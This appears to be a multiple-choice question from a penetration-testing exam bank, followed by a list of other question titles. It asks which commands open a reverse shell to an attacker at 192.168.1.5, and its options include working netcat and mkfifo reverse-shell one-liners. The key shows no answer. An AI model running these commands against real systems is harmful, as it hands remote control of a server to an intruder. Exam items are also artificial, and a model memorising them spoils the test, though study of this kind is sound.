Multiple Choice
During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO) .
A) nc 192.168.1.5 44444
B) nc -nlvp 44444 -e /bin/sh
C) rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/tmp/f
D) nc -e /bin/sh 192.168.1.5 44444
E) rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 444444>/tmp/f
F) rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.5.1 44444>/tmp/f
Correct Answer:
Verified
Correct Answer:
Verified
Q155: A penetration tester successfully exploits a DMZ
Q156: The following command is run on a
Q157: A penetration tester discovers an anonymous FTP
Q158: Which of the following BEST describes some
Q159: A penetration tester has been asked to
Q160: A penetration tester successfully exploits a system,
Q161: A penetration tester compromises a system that
Q163: A penetration tester is testing a banking
Q164: A penetration tester identifies the following findings
Q165: A penetration tester has performed a security